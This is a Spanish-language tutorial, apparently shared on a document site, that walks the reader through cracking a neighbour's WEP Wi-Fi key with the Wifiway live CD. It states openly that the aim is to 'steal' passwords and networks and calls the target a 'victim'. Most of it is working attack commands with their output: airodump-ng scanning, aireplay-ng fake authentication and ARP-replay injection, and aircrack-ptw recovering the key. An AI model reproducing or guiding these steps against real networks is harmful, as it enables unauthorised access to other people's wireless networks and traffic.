You are on page 1of 4

Bueno pues una vez ke tienen el Wi Fi 0.

6 dentro de un disco será hora de actuar…

Antes de todo deben conocer un dato muy importante: la MAC o BSSID de su tarjeta de
red inalámbrica. Para conocer este dato deben dar doble clic al icono de conexión
inalámbrica ke tienen en la barra de tareas, luego dar clic en la opcion que dice:
propiedades luego clic donde dice: configurar, posteriormente deben ir a la
pestaña llamada: Avanzadas y en la parte inferior de esa ventana aparecerá
algo que dice:

Dirección MAC: E5:34:F6:32:56 Esta direccion es solo un


ejemplo…. Ustedes deberán escribir su direccion MAC en un papel ya que será
indispensable mas adelante.

1.- Una vez que introducen el disco en su maquina, deberán cerrar toda ventana que
tengan abierta y reiniciar.

Se comenzará a cargar el Wi Fi 0.6 ke korre bajo Linux, pero no se espanten, todo lo ke


suceda desde ke reinician el sistema se estará corriendo desde el disco ke quemaron asi
ke no hay de ke preocuparse…

2.- Después de unos 40 a 50 segundos de carga, el programa les pedirá el idioma, el cual
deberán seleccionar de una lista y presionar enter.

3.- Ahora les pedirá el horario del lugar donde se encuentran, el cual deberán
seleccionar de la lista mostrada y presionar enter 2 veces ya ke después del primer enter
les pedirá confirmar entonces solo vuelven a presionar enter.

4.- Una vez cargado el idioma y el horario les aparecerá un cursor…. Alli deberán
escribir: startx y presionar enter.

Después de este paso se comenzará a cargar el escritorio de Linux, que vuelo a aclarar,
TODO ESTÁ CORRIENDO DESDE EL DISCO.

LLEGO LA HORA DE ROBAR CONTRASEÑAS!!!!!!!!!!!

Antes de empezar a actuar kiero decirles ke vamos a escribir una serie de cosas de las
cuales deben tener mucho cuidado con la sintaxis ya que si algo escriben mal nada va a
funcionar, asi ke fijense muy bien en los espacios, puntos, comas, guiones, etc

5.- Una vez que se cargue el escritorio deberán abrir una consola. Solo deben dar un
click a un cuadro negro que se encuentra entre una serie de iconos en la parte inferior
izquierda de la pantalla… Esta pantalla les mostrará:

wifiway:/# y delante un cursor donde teklearemos: ipw3945_es.sh

y presionan enter. Una vez que presionen enter se les pedirá un canal, el cual es el
canal que el MODEM tiene configurado. La mayoría de los MODEM inalámbricos
tienen configurado el canal 11 pero ustedes pueden probar con todos (1-11). Estos
primeros pasos solo son para detectar las redes que hay anuestro alrededor, así que
pueden escribir 11 y presionar enter.

Ahora les pedirá el rate de captura que siempre es 2, asi ke escriben 2 y


presionan enter.

Por ultimo les pedirá la MAC de la victima… Para no meterse en problemas con
esto alli deben escribir: 00:11:22:33:44:55 y presionan enter.

Ahora lanzamos en la misma consola:

wifiway:/# airodump-ng rtap0 presionan enter y aparecerá lo siguiente:


CH 9 ][ Elapsed: 4 s ][ 2007-02-25 16:47

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR


00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear

BSSID STATION PWR Lost Packets Probes

00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14
(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 5

(Si con el canal 11 no detecto ninguna red deberán cerrar la consola, abrir una nueva y
repetir los pasos hasta ahora descritos pero con otro canal… Pueden ir probando con
todos los canales que son del 1 al 11).

Debemos apuntar (o copiar seleccionando, para los no iniciados en linux, copiar se hace
simplemente seleccionando y pegar con los dos botones a la vez del ratón) la MAC del
AP Objetivo y su ESSID. Cabe señalar que la MAC es lo mismo que BSSID así que
deberán anotar en un papel ese dato, así como el nombre de la red (ESSID). En donde
dice CH ese es el canal en el cual opera dicha red. Una vez que conocemos la BSSID, la
ESSID y el canal de operación de la red que queremos robar deberán cerrar la consola,
abrir una nueva y haremos los mismos pasos que hasta ahora pero esta vez diciéndole el
canal y la MAC del AP de verdad:

wifiway:/# ipw3945_es.sh

Canal: El correspondiente al AP Objetivo


Rate : 2
MAC : MAC del AP Objetivo

Ya tenemos preparada la tarjeta para empezar a inyectar código, tecleando en la misma


consola los siguientes códigos, mandaremos con nuestra Intel 3945 ABG un paquetito
de asociación al AP Objetivo. Antes de comenzar a escribir kiero aclarar de nuevo ke
deben de fijarse muy bien en todos los espacios y signos de puntuación. Al teclear lo
siguiente, donde dice ESSID, deben escribir el nombre de la red, donde dice BSSID
deberán escribir el BSSID de la red y donde dice NUESTRA deberán escribir la MAC
correspondiente a su tarjeta de red que pedi al inicio.
wifiway:/# aireplay-ng -1 0 -e ESSID -a BSSID -h NUESTRA wifi0

18:18:20 Sending Authentication Request


18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Acabamos de ver que se ha autenticado contra el AP, es decir aceptará todo lo que le
mandemos siempre y cuando vaya encriptado con la wep, lo que haremos ahora será
capturar paquetes encriptados y reenviarlos de nuevo al AP, previa copia en nuestro
disco duro para posterior análisis:

wifiway:/# aireplay-ng -3 -b MAC -h NUESTRA wifi0

Saving ARP requests in replay_arp-0219-123051.cap


You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Dejamos trabajando esa consola y abrimos una nueva para poner a capturar a airodump:

wifiway:/# airodump-ng -w /tmp/dump rtap0


CH 9 ][ Elapsed: 4 s ][ 2007-02-25 16:47

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR


00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear

BSSID STATION PWR Lost Packets Probes

00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14
(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 5

Ahora debemos esperar a que la primera consola, en la que está corriendo el aireplay -3
a que capture algún paquete ARP y en cuanto lo haga empezará a inyectar para generar
tráfico encriptado con la clave WEP del AP Objetivo. En cuanto esto ocurra en la
segunda consola, en la que esta corriendo airodump, empezaremos a ver como el
numero de paquetes DATA del Ap Objetivo empieza a subir.

Cuando debemos parar, buena pregunta, para claves de 64 bits con 200.000 paquetes
DATA será suficiente, para claves de 128 bits, unos 400.000.... Como no sabemos de
que tamaño es la clave podemos esperar a tener 200.000 DATA y en una tercera
consola, sin parar ninguna de las otras dos, ejecutar:
wifiway:/# aircrack-ptw /tmp/dump-01.cap

This is aircrack-ptw 1.0.0


For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:19:5B:97:F3:64 keyindex=0
stats for bssid 00:19:5B:97:F3:64 keyindex=0 packets=21938
Found key with len 13: 44 44 44 44 44 44 44 44 44 44 44 44 44

Si nos da la clave ya podremos parar las otras consolas, si aun no nos la da seguiremos
esperando.....

10 minutos despues...

Seguro que ya la tenemos.

Cualquier duda posteen.

You might also like